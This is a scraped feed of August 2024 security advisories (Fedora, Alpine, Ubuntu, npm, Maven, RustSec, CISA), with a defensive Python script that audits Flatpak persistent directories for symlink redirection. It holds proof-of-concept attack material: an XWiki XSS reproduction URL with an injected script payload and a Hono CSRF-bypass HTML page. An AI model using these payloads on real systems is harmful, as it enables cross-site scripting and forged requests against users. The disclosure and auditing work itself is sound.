https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:9D8E9952-5A42-11EF-A219-1C697A616631
16.08.2024 16:08:14 | fedora | [FEDORA-2024-3f9eb3c86c] Fedora 40: tor | Re-add systemd-devel as build dependency so the daemon knows how to notify systemd that it was started - fixes bz#2302910 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-3f9eb3c86c
16.08.2024 05:15:17 | alpinelinux | [ALPINE:CVE-2024-43374] vim vulnerability | [From CVE-2024-43374] The UNIX editor Vim prior to version 9.1.0678 has a use-after-free error in argument list handling. When adding a new file to the argument list, this triggers `Buf*` autocommands. If in such an autocommand the buffer that was just opened is closed (including the window where it is shown), this causes the window structure to be freed which contains a reference to the argument list that we are actually modifying. Once the autocommands are completed, the references to the window and argument list are no longer valid and as such cause a use-after-free. Impact is low since the user must either intentionally add some unusual autocommands that wipe a buffer during creation (either manually or by sourcing a malicious plugin), but it will crash Vim. The issue has been fixed as of Vim patch v9.1.0678. | https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-43374
16.08.2024 04:21:46 | fedora | [FEDORA-2024-c452738920] Fedora 39: python3.13 | Security fix for CVE-2024-6923. Fix SystemError in PyEval_GetLocals(). | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c452738920
16.08.2024 04:21:38 | fedora | [FEDORA-2024-7fe5206574] Fedora 39: thunderbird | Update to 115.14.0 (https://www.thunderbird.net/en-US/thunderbird/115.14.0esr/releasenotes/, https://www.mozilla.org/en-US/security/advisories/mfsa2024-38/) | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7fe5206574
16.08.2024 04:21:36 | fedora | [FEDORA-2024-c2da7f4de7] Fedora 39: tor | Re-add systemd-devel as build dependency so the daemon knows how to notify systemd that it was started - fixes bz#2302910 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c2da7f4de7
15.08.2024 22:15:19 | alpinelinux | [ALPINE:CVE-2024-42472] flatpak, bubblewrap vulnerability | [From CVE-2024-42472] Flatpak is a Linux application sandboxing and distribution framework. Prior to versions 1.14.0 and 1.15.10, a malicious or compromised Flatpak app using persistent directories could access and write files outside of what it would otherwise have access to, which is an attack on integrity and confidentiality.

When `persistent=subdir` is used in the application permissions (represented as `--persist=subdir` in the command-line interface), that means that an application which otherwise doesn't have access to the real user home directory will see an empty home directory with a writeable subdirectory `subdir`. Behind the scenes, this directory is actually a bind mount and the data is stored in the per-application directory as `~/.var/app/$APPID/subdir`. This allows existing apps that are not aware of the per-application directory to still work as intended without general home directory access.

However, the application does have write access to the application directory `~/.var/app/$APPID` where this directory is stored. If the source directory for the `persistent`/`--persist` option is replaced by a symlink, then the next time the application is started, the bind mount will follow the symlink and mount whatever it points to into the sandbox.

Partial protection against this vulnerability can be provided by patching Flatpak using the patches in commits ceec2ffc and 98f79773. However, this leaves a race condition that could be exploited by two instances of a malicious app running in parallel. Closing the race condition requires updating or patching the version of bubblewrap that is used by Flatpak to add the new `--bind-fd` option using the patch and then patching Flatpak to use it.

If Flatpak has been configured at build-time with `-Dsystem_bubblewrap=bwrap` (1.15.x) or `--with-system-bubblewrap=bwrap` (1.14.x or older), or a similar option, then the version of bubblewrap that needs to be patched is a system copy that is distributed separately, typically `/usr/bin/bwrap`. This configuration is the one that is typically used in Linux distributions. If Flatpak has been configured at build-time with `-Dsystem_bubblewrap=` (1.15.x) or with `--without-system-bubblewrap` (1.14.x or older), then it is the bundled version of bubblewrap that is included with Flatpak that must be patched. This is typically installed as `/usr/libexec/flatpak-bwrap`. This configuration is the default when building from source code.

For the 1.14.x stable branch, these changes are included in Flatpak 1.14.10. The bundled version of bubblewrap included in this release has been updated to 0.6.3. For the 1.15.x development branch, these changes are included in Flatpak 1.15.10. The bundled version of bubblewrap in this release is a Meson "wrap" subproject, which has been updated to 0.10.0. The 1.12.x and 1.10.x branches will not be updated for this vulnerability. Long-term support OS distributions should backport the individual changes into their versions of Flatpak and bubblewrap, or update to newer versions if their stability policy allows it. As a workaround, avoid using applications using the `persistent` (`--persist`) permission. | https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-42472
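The Flatpak entry describes the precondition an attacker has to leave on disk: the source of a `persistent=` bind mount under `~/.var/app/$APPID` replaced by a symlink, to be followed on the app's next start. That state is easy to look for on a host that cannot yet take the 1.14.10/1.15.10 update. The following is an added example, not code from Flatpak: it reads an app's metadata keyfile, takes the subdirectories granted through `persistent=` in `[Context]`, and walks `~/.var/app/$APPID/<subdir>` component by component with lstat semantics, reporting any symlink on the path (a link at a parent component redirects the mount just as well as one at the leaf). The metadata text and directory tree are constructed; the install locations in `scan_installed()` are the usual system and user Flatpak paths and are an assumption to adjust for your layout.

```python
"""Audit Flatpak persistent directories for symlinks (CVE-2024-42472).

Added example, not part of Flatpak. DEMO_METADATA and the tree built by
build_demo() are constructed; scan_installed() assumes the standard
/var/lib/flatpak and ~/.local/share/flatpak install locations.
"""
import configparser
import os
import pathlib
import tempfile


def persistent_dirs(metadata_text):
    """Subdirectories listed in [Context] persistent= (semicolon separated)."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",),
                                   allow_no_value=True, strict=False)
    cp.optionxform = str                      # keyfile keys are case-sensitive
    cp.read_string(metadata_text)
    raw = cp.get("Context", "persistent", fallback="") or ""
    return [d for d in raw.split(";") if d]


def first_symlink_component(app_data_dir, subdir):
    """Walk app_data_dir/subdir one component at a time without following
    links and return the first symlink found, or None."""
    p = pathlib.Path(app_data_dir)
    for part in pathlib.PurePosixPath(subdir).parts:
        p = p / part
        if p.is_symlink():                    # lstat: the link itself, not its target
            return p
        if not p.exists():                    # nothing persisted yet: nothing to redirect
            return None
    return None


def audit_app(app_id, metadata_text, var_app_root):
    """Return [(subdir, symlink path, link target)] for every persist dir
    whose source has been turned into (or routed through) a symlink."""
    app_dir = pathlib.Path(var_app_root) / app_id
    findings = []
    for subdir in persistent_dirs(metadata_text):
        link = first_symlink_component(app_dir, subdir)
        if link is not None:
            findings.append((subdir, str(link), os.readlink(link)))
    return findings


def scan_installed(var_app_root=os.path.expanduser("~/.var/app")):
    """Run audit_app over every installed app; {app_id: findings}."""
    results = {}
    for base in ("/var/lib/flatpak/app",
                 os.path.expanduser("~/.local/share/flatpak/app")):
        for meta in pathlib.Path(base).glob("*/current/active/metadata"):
            app_id = meta.parts[-4]           # .../app/<id>/current/active/metadata
            results[app_id] = audit_app(app_id, meta.read_text(), var_app_root)
    return results


# Constructed metadata for a demo app that asks for persistent=.myconfig
DEMO_METADATA = """\
[Application]
name=org.example.App
runtime=org.freedesktop.Platform/x86_64/23.08
command=app

[Context]
shared=network;
persistent=.myconfig;
"""


def build_demo(malicious=True):
    """Create a throwaway ~/.var/app tree; with malicious=True the persist
    source is a symlink out of the app's private directory (dangling here)."""
    root = pathlib.Path(tempfile.mkdtemp()) / ".var" / "app"
    app_dir = root / "org.example.App"
    app_dir.mkdir(parents=True)
    if malicious:
        (app_dir / ".myconfig").symlink_to("../../../.ssh")
    else:
        (app_dir / ".myconfig").mkdir()
    return str(root)


if __name__ == "__main__":
    for subdir, link, target in audit_app("org.example.App", DEMO_METADATA, build_demo()):
        print(f"persist dir {subdir!r}: {link} -> {target}")
```

A finding is a strong signal but not proof on its own, since a user can create such a link deliberately; the advisory's workaround of not running apps with the `persistent` permission until the fixed Flatpak and bubblewrap are in place still applies.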
15.08.2024 22:09:34ubuntu[USN-6909-3] Bind vulnerabilitiesSeveral security issues were fixed in Bind.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6909-3
15.08.2024 22:00:10ubuntu[USN-6964-1] ORC vulnerabilityORC could be made to crash or execute arbitrary codehttps://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6964-1
16.08.2024 01:19:00maven[MAVEN:GHSA-CPFP-M5QW-C4R3] Improper Preservation of Permissions in xxl-job (moderate)Insecure Permissions vulnerability in xxl-job v.2.4.1 allows a remote attacker to execute arbitrary code via the Sub-Task ID component.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CPFP-M5QW-C4R3
16.08.2024 21:15:40npm[NPM:GHSA-VWHG-JWR4-VXGG] gettext.js has a Cross-site Scripting injection (high)### ImpactPossible vulnerability to XSS injection if .po dictionary definition files is corrupted### PatchesUpdate gettext.js to 2.0.3### WorkaroundsMake sure you control the origin of the definition catalog to prevent the use of this flaw in the definition of plural forms.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-VWHG-JWR4-VXGG
15.08.2024 17:23:12fedora[FEDORA-2024-b60eb661a4] Fedora 39: roundcubemailVersion 1.6.8Managesieve: Protect special scripts in managesieve_kolab_master modeFix newmail_notifier notification focus in Chrome (#9467)Fix fatal error when parsing some TNEF attachments (#9462)Fix double scrollbar when composing a mail with many plain text lines (#7760)Fix decoding mail parts with multiple base64-encoded text blocks (#9290)Fix bug where some messages could get malformed in an import from a MBOX file(#9510)Fix invalid line break characters in multi-line text in Sieve scripts (#9543)Fix bug where "with attachment" filter could fail on some fts engines (#9514)Fix bug where an unhandled exception was caused by an invalid image attachment(#9475)Fix bug where a long subject title could not be displayed in some cases (#9416)Fix infinite loop when parsing malformed Sieve script (#9562)Fix bug where imap_conn_option's 'socket' was ignored (#9566)Fix XSS vulnerability in post-processing of sanitized HTML contentCVE-2024-42009Fix XSS vulnerability in serving of attachments other than HTML or SVGCVE-2024-42008Fix information leak (access to remote content) via insufficient CSS filteringCVE-2024-42010https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b60eb661a4
15.08.2024 17:23:11fedora[FEDORA-2024-c8290315df] Fedora 39: 389-ds-baseChangelog* Tue Jul 30 2024 Viktor Ashirov <vashirov(a)redhat.com> - 2.4.6-1- Update to 2.4.6- Resolves: CVE-2024-1062 (rhbz#2261884)- Resolves: CVE-2024-2199 (rhbz#2283632)- Resolves: CVE-2024-3657 (rhbz#2283631)- Resolves: CVE-2024-5953 (rhbz#2292109)https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c8290315df
15.08.2024 17:23:11fedora[FEDORA-2024-70741fe21f] Fedora 39: dotnet8.0This is the July 2024 security updates for .NET 8.Release Notes:SDK: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.7/8.0.107.mdRuntime: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.7/8.0.7.mdhttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-70741fe21f
15.08.2024 16:19:28ubuntu[USN-6963-1] GNOME Shell vulnerabilityGNOME Shell could allow unintended access to network services.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6963-1
15.08.2024 14:55:52ubuntu[USN-6962-1] LibreOffice vulnerabilityLibreOffice could be made to run programs if it opened a specially craftedfile.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6962-1
16.08.2024 00:56:18npm[NPM:GHSA-Q83V-HQ3J-4PQ3] Improper access control in Directus (moderate)Directus v10.13.0 allows an authenticated external attacker to modify presets created by the same user to assign them to another user. This is possible because the application only validates the user parameter in the 'POST /presets' request but not in the PATCH request. When chained with CVE-2024-6533, it could result in account takeover.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-Q83V-HQ3J-4PQ3
16.08.2024 00:55:25npm[NPM:GHSA-QF6H-P3MR-VMH5] Code injection in Directus (moderate)Directus v10.13.0 allows an authenticated external attacker to execute arbitrary JavaScript on the client. This is possible because the application injects an attacker-controlled parameter that will be stored in the server and used by the client into an unsanitized DOM element. When chained with CVE-2024-6534, it could result in account takeover.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QF6H-P3MR-VMH5
15.08.2024 05:34:19fedora[FEDORA-2024-2e908e829a] Fedora 40: roundcubemailVersion 1.6.8Managesieve: Protect special scripts in managesieve_kolab_master modeFix newmail_notifier notification focus in Chrome (#9467)Fix fatal error when parsing some TNEF attachments (#9462)Fix double scrollbar when composing a mail with many plain text lines (#7760)Fix decoding mail parts with multiple base64-encoded text blocks (#9290)Fix bug where some messages could get malformed in an import from a MBOX file(#9510)Fix invalid line break characters in multi-line text in Sieve scripts (#9543)Fix bug where "with attachment" filter could fail on some fts engines (#9514)Fix bug where an unhandled exception was caused by an invalid image attachment(#9475)Fix bug where a long subject title could not be displayed in some cases (#9416)Fix infinite loop when parsing malformed Sieve script (#9562)Fix bug where imap_conn_option's 'socket' was ignored (#9566)Fix XSS vulnerability in post-processing of sanitized HTML contentCVE-2024-42009Fix XSS vulnerability in serving of attachments other than HTML or SVGCVE-2024-42008Fix information leak (access to remote content) via insufficient CSS filteringCVE-2024-42010https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-2e908e829a
15.08.2024 05:34:18fedora[FEDORA-2024-ac07913be8] Fedora 40: 389-ds-baseChangelog* Tue Jul 30 2024 Viktor Ashirov <vashirov(a)redhat.com> - 3.0.4-2- Replace lmdb with lmdb-libs in Requires* Tue Jul 30 2024 Viktor Ashirov <vashirov(a)redhat.com> - 3.0.4-1- Update to 3.0.4- Resolves: CVE-2024-1062 (rhbz#2261884)- Resolves: CVE-2024-2199 (rhbz#2283632)- Resolves: CVE-2024-3657 (rhbz#2283631)- Resolves: CVE-2024-5953 (rhbz#2292109)https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ac07913be8
15.08.2024 05:34:16fedora[FEDORA-2024-04cb0f92bc] Fedora 40: dotnet8.0This is the July 2024 security updates for .NET 8.Release Notes:SDK: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.7/8.0.107.mdRuntime: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.7/8.0.7.mdhttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-04cb0f92bc
15.08.2024 03:00:00cisa[CISA-2024:0815] CISA Adds One Known Exploited Vulnerability to CatalogCISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0815
17.08.2024 04:51:07 | fedora | [FEDORA-2024-e83af0855e] Fedora 39: httpd
Fix regression introduced by CVE-2024-38474 fix
new version 2.4.62
Fixes CVE-2024-40725
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e83af0855e

17.08.2024 04:51:06 | fedora | [FEDORA-2024-ef8a7031e7] Fedora 39: bind, bind-dyndb-ldap
Update to BIND 9.18.28

Security Fixes

A malicious DNS client that sent many queries over TCP but never read the responses could cause a server to respond slowly or not at all for other clients. This has been fixed. (CVE-2024-0760) [GL #4481]

It is possible to craft excessively large resource record sets, which have the effect of slowing down database processing. This has been addressed by adding a configurable limit to the number of records that can be stored per name and type in a cache or zone database. The default is 100, which can be tuned with the new max-records-per-type option. [GL #497] [GL #3405]

It is possible to craft excessively large numbers of resource record types for a given owner name, which has the effect of slowing down database processing. This has been addressed by adding a configurable limit to the number of records that can be stored per name and type in a cache or zone database. The default is 100, which can be tuned with the new max-types-per-name option. (CVE-2024-1737) [GL #3403]

ISC would like to thank Toshifumi Sakaguchi who independently discovered and responsibly reported the issue to ISC. [GL #4548]

Validating DNS messages signed using the SIG(0) protocol (RFC 2931) could cause excessive CPU load, leading to a denial-of-service condition. Support for SIG(0) message validation was removed from this version of named. (CVE-2024-1975) [GL #4480]

Due to a logic error, lookups that triggered serving stale data and required lookups in local authoritative zone data could have resulted in an assertion failure. This has been fixed. (CVE-2024-4076) [GL #4507]

Potential data races were found in our DoH implementation, related to HTTP/2 session object management and endpoints set object management after reconfiguration. These issues have been fixed. [GL #4473]

ISC would like to thank Dzintars and Ivo from nic.lv for bringing this to our attention.

When looking up the NS records of parent zones as part of looking up DS records, it was possible for named to trigger an assertion failure if serve-stale was enabled. This has been fixed. [GL #4661]

https://downloads.isc.org/isc/bind9/9.18.28/doc/arm/html/notes.html
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ef8a7031e7

18.08.2024 03:00:00 | debian | [DSA-5750-1] python-asyncssh
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5750-1

18.08.2024 03:00:00 | freebsd | [FREEBSD:AC025402-4CBC-4177-BD99-C20C03A07F23] electron{29,30} -- multiple vulnerabilities
Electron developers report:
This update fixes the following vulnerabilities:
- Security: backported fix for CVE-2024-6776.
- Security: backported fix for CVE-2024-6778.
- Security: backported fix for CVE-2024-6777.
- Security: backported fix for CVE-2024-6773.
- Security: backported fix for CVE-2024-6774.
- Security: backported fix for CVE-2024-6772.
- Security: backported fix for CVE-2024-6775.
- Security: backported fix for CVE-2024-6779.
- Security: backported fix for CVE-2024-6989.
- Security: backported fix for CVE-2024-6991.
https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:AC025402-4CBC-4177-BD99-C20C03A07F23

18.08.2024 03:00:00 | freebsd | [FREEBSD:E61AF8F4-455D-4F99-8D81-FBB004929DAB] electron31 -- multiple vulnerabilities
Electron developers report:
This update fixes the following vulnerabilities:
- Security: backported fix for CVE-2024-6989.
- Security: backported fix for CVE-2024-6991.
https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:E61AF8F4-455D-4F99-8D81-FBB004929DAB

20.08.2024 03:02:38 | ubuntu | [USN-6967-1] Intel Microcode vulnerabilities (high)
Several security issues were fixed in Intel Microcode.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6967-1

20.08.2024 00:49:15 | maven | [MAVEN:GHSA-F963-4CQ8-2GW7] In XWiki Platform, payloads stored in content is executed when a user with script/programming right edit them (critical)
### Impact
A user without script/programming right can trick a user with elevated rights to edit content with a malicious payload using a WYSIWYG editor. The user with elevated rights is not warned beforehand that they are going to edit possibly dangerous content. The payload is executed at edit time.
### Patches
This vulnerability has been patched in XWiki 15.10RC1.
### Workarounds
No workaround. It is advised to upgrade to XWiki 15.10+.
### References
* https://jira.xwiki.org/browse/XWIKI-20331
* https://jira.xwiki.org/browse/XWIKI-21311
* https://jira.xwiki.org/browse/XWIKI-21481
* https://jira.xwiki.org/browse/XWIKI-21482
* https://jira.xwiki.org/browse/XWIKI-21483
* https://jira.xwiki.org/browse/XWIKI-21484
* https://jira.xwiki.org/browse/XWIKI-21485
* https://jira.xwiki.org/browse/XWIKI-21486
* https://jira.xwiki.org/browse/XWIKI-21487
* https://jira.xwiki.org/browse/XWIKI-21488
* https://jira.xwiki.org/browse/XWIKI-21489
* https://jira.xwiki.org/browse/XWIKI-21490
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:security@xwiki.org)
### Attribution
This vulnerability has been reported on Intigriti by @floerer
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-F963-4CQ8-2GW7

20.08.2024 00:49:10 | maven | [MAVEN:GHSA-WCG9-PGQV-XM5V] XWiki Platform allows XSS through XClass name in string properties (critical)
### Impact
It is possible for a user without Script or Programming rights to craft a URL pointing to a page with arbitrary JavaScript. This requires social engineering to trick a user to follow the URL.
#### Reproduction steps
1. As a user without script or programming right, create a (non-terminal) document named `" + alert(1) + "` (the quotes need to be part of the name).
2. Edit the class.
3. Add a string property named `"test"`.
4. Edit using the object editor and add an object of the created class.
5. Get an admin to open `<xwiki-server>/xwiki/bin/view/%22%20%2B%20alert(1)%20%2B%20%22/?viewer=display&type=object&property=%22%20%2B%20alert(1)%20%2B%20%22.WebHome.test&mode=edit` where `<xwiki-server>` is the URL of your XWiki installation.
### Patches
This has been patched in XWiki 14.10.21, 15.5.5, 15.10.6 and 16.0.0.
### Workarounds
We're not aware of any workaround except upgrading.
### References
- https://jira.xwiki.org/browse/XWIKI-21810
- https://github.com/xwiki/xwiki-platform/commit/27eca8423fc1ad177518077a733076821268509c
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-WCG9-PGQV-XM5V

19.08.2024 18:54:38 | ubuntu | [USN-6951-3] Linux kernel (Azure) vulnerabilities (critical)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6951-3

19.08.2024 18:04:17 | ubuntu | [USN-6968-1] PostgreSQL vulnerability (high)
PostgreSQL could execute arbitrary SQL functions as the superuser if it received a specially crafted SQL object.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6968-1

19.08.2024 06:36:06 | ubuntu | [USN-6966-1] Firefox vulnerabilities (critical)
Several security issues were fixed in Firefox.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6966-1

20.08.2024 00:48:57 | maven | [MAVEN:GHSA-R6PH-5FP2-3W2V] Microcks's POST /api/import and POST /api/export endpoints allow non-administrator access (moderate)
In Microcks before 1.10.0, the POST /api/import and POST /api/export endpoints allow non-administrator access.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-R6PH-5FP2-3W2V

19.08.2024 03:28:21 | ubuntu | [USN-6837-2] Rack vulnerabilities (medium)
Several security issues were fixed in Rack.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6837-2

19.08.2024 03:00:00 | cisa | [CISA-2024:0819] CISA Adds One Known Exploited Vulnerability to Catalog
CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0819

19.08.2024 03:00:00 | debian | [DSA-5751-1] squid
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5751-1

20.08.2024 00:09:25 | maven | [MAVEN:GHSA-H6JQ-W432-J26W] Silverpeas vulnerable to password complexity rule bypass (low)
An issue in the password change function of Silverpeas v6.4.2 and lower allows for the bypassing of password complexity requirements.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-H6JQ-W432-J26W

20.08.2024 21:35:28 | npm | [NPM:GHSA-VHR5-G3PM-49FM] matrix-js-sdk will freeze when a user sets a room with itself as its predecessor (moderate)
### Impact
A malicious homeserver can craft a room or room structure such that the predecessors form a cycle. The matrix-js-sdk's `getRoomUpgradeHistory` function will infinitely recurse in this case, causing the code to hang. This method is public but also called by the `leaveRoomChain()` method, so leaving a room will also trigger the bug.
Even though the CVSS score would be 4.1 ([AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:L](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:L&version=3.1)), we classify this as a High severity issue.
### Patches
This was patched in matrix-js-sdk 34.3.1.
### Workarounds
Sanity check rooms before passing them to the matrix-js-sdk or avoid calling either `getRoomUpgradeHistory` or `leaveRoomChain`.
### References
N/A.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-VHR5-G3PM-49FM

20.08.2024 21:15:39 | ubuntu | [USN-6944-2] curl vulnerability
curl could be made to crash or expose information if it received specially crafted network traffic.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6944-2

20.08.2024 16:03:07 | ubuntu | [USN-6970-1] exfatprogs vulnerability
exfatprogs could be made to crash or run programs if it handled a specially crafted partition.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6970-1

20.08.2024 14:14:34 | ubuntu | [USN-6969-1] Cacti vulnerabilities
Several security issues were fixed in Cacti.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6969-1

21.08.2024 00:21:50 | pypi | [PYSEC-2024-71] flask-cors vulnerability (high)
A vulnerability in corydolphin/flask-cors version 4.0.1 allows the `Access-Control-Allow-Private-Network` CORS header to be set to true by default, without any configuration option. This behavior can expose private network resources to unauthorized external access, leading to significant security risks such as data breaches, unauthorized access to sensitive information, and potential network intrusions.
https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-71

23.08.2024 21:52:48 | maven | [MAVEN:GHSA-7CJ3-X93G-GJ76] Signature forgery in Spring Boot's Loader (moderate)
Applications that use spring-boot-loader or spring-boot-loader-classic and contain custom code that performs signature verification of nested jar files may be vulnerable to signature forgery where content that appears to have been signed by one signer has, in fact, been signed by another.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7CJ3-X93G-GJ76

23.08.2024 04:49:50 | fedora | [FEDORA-2024-a562addefa] Fedora 40: iaito, radare2 (high)
Bump to version 5.9.4
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-a562addefa

23.08.2024 04:24:55 | fedora | [FEDORA-2024-c611359ae1] Fedora 39: community-mysql (medium)
MySQL 8.0.39
Release notes:
https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-38.html
https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-39.html
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c611359ae1

23.08.2024 04:24:53 | fedora | [FEDORA-2024-3667e29b88] Fedora 39: iaito, radare2 (critical)
Bump to version 5.9.4
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-3667e29b88

23.08.2024 17:03:08 | rustsec | [RUSTSEC-2024-0365] Binary Protocol Misinterpretation caused by Truncating or Overflowing Casts
The following presentation at this year's DEF CON was brought to our attention on the Diesel Gitter Channel:

> SQL Injection isn't Dead: Smuggling Queries at the Protocol Level
> <http://web.archive.org/web/20240812130923/https://media.defcon.org/DEF%20CON%2032/DEF%20CON%2032%20presentations/DEF%20CON%2032%20-%20Paul%20Gerste%20-%20SQL%20Injection%20Isn't%20Dead%20Smuggling%20Queries%20at%20the%20Protocol%20Level.pdf>
> (Archive link for posterity.)

Essentially, encoding a value larger than 4GiB can cause the length prefix in the protocol to overflow, causing the server to interpret the rest of the string as binary protocol commands or other data.

It appears Diesel _does_ perform truncating casts in a way that could be problematic, for example: <https://github.com/diesel-rs/diesel/blob/ae82c4a5a133db65612b7436356f549bfecda1c7/diesel/src/pg/connection/stmt/mod.rs#L36>

This code has existed essentially since the beginning, so it is reasonable to assume that all published versions `<= 2.2.2` are affected.

## Mitigation
The preferred migration to the outlined problem is to update to a Diesel version newer than 2.2.2, which includes fixes for the problem.

As always, you should make sure your application is validating untrustworthy user input. Reject any input over 4 GiB, or any input that could _encode_ to a string longer than 4 GiB. Dynamically built queries are also potentially problematic if they push the message size over this 4 GiB bound.

For web application backends, consider adding some middleware that limits the size of request bodies by default.

## Resolution
Diesel now uses `#[deny]` directives for the following Clippy lints:
* [`cast_possible_truncation`](https://rust-lang.github.io/rust-clippy/master/#/cast_possible_truncation)
* [`cast_possible_wrap`](https://rust-lang.github.io/rust-clippy/master/#/cast_possible_wrap)
* [`cast_sign_loss`](https://rust-lang.github.io/rust-clippy/master/#/cast_sign_loss)

to prevent casts that will lead to precision loss or other truncations. Additionally we performed an audit of the relevant code.

A fix is included in the `2.2.3` release.
https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0365

23.08.2024 03:00:00 | cisa | [CISA-2024:0823] CISA Adds One Known Exploited Vulnerability to Catalog (medium)
CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0823

23.08.2024 03:00:00 | debian | [DSA-5757-1] chromium (high)
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5757-1

22.08.2024 22:15:09 | alpinelinux | [ALPINE:CVE-2024-8088] python3 vulnerability (high)
[From CVE-2024-8088] There is a HIGH severity vulnerability affecting the CPython "zipfile" module.

When iterating over names of entries in a zip archive (for example, methods of "zipfile.ZipFile" like "namelist()", "iterdir()", "extractall()", etc) the process can be put into an infinite loop with a maliciously crafted zip archive. This defect applies when reading only metadata or extracting the contents of the zip archive. Programs that are not handling user-controlled zip archives are not affected.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-8088

22.08.2024 19:41:09 | npm | [NPM:GHSA-RPFR-3M35-5VX5] Hono CSRF middleware can be bypassed using crafted Content-Type header (moderate)
### Summary
Hono CSRF middleware can be bypassed using a crafted Content-Type header.
### Details
MIME types are case insensitive, but `isRequestedByFormElementRe` only matches lower-case.
https://github.com/honojs/hono/blob/b0af71fbcc6dbe44140ea76f16d68dfdb32a99a0/src/middleware/csrf/index.ts#L16-L17
As a result, an attacker can bypass the CSRF middleware using an upper-case form-like MIME type, such as "Application/x-www-form-urlencoded".
### PoC
```html
<html>
  <head>
    <title>CSRF Test</title>
    <script defer>
      document.addEventListener("DOMContentLoaded", () => {
        document.getElementById("btn").addEventListener("click", async () => {
          const res = await fetch("http://victim.example.com/test", {
            method: "POST",
            credentials: "include",
            headers: {
              "Content-Type": "Application/x-www-form-urlencoded",
            },
          });
        });
      });
    </script>
  </head>
  <body>
    <h1>CSRF Test</h1>
    <button id="btn">Click me!</button>
  </body>
</html>
```
### Impact
Bypass of CSRF protection implemented with the Hono CSRF middleware.
### Discussion
I'm not sure that omitting CSRF checks for simple POST requests is a good idea. CSRF prevention and CORS are different concepts even though CORS can prevent CSRF in some cases.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RPFR-3M35-5VX5

22.08.2024 04:09:47 | fedora | [FEDORA-2024-ba78b27eb8] Fedora 39: webkitgtk (critical)
- Fix web process cache suspend/resume when sandbox is enabled.
- Fix accelerated images disappearing after scrolling.
- Fix video flickering with DMA-BUF sink.
- Fix pointer lock on X11.
- Fix movement delta on mouse events in GTK3.
- Undeprecate console message API and make it available in 2022 API.
- Fix several crashes and rendering issues.
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ba78b27eb8

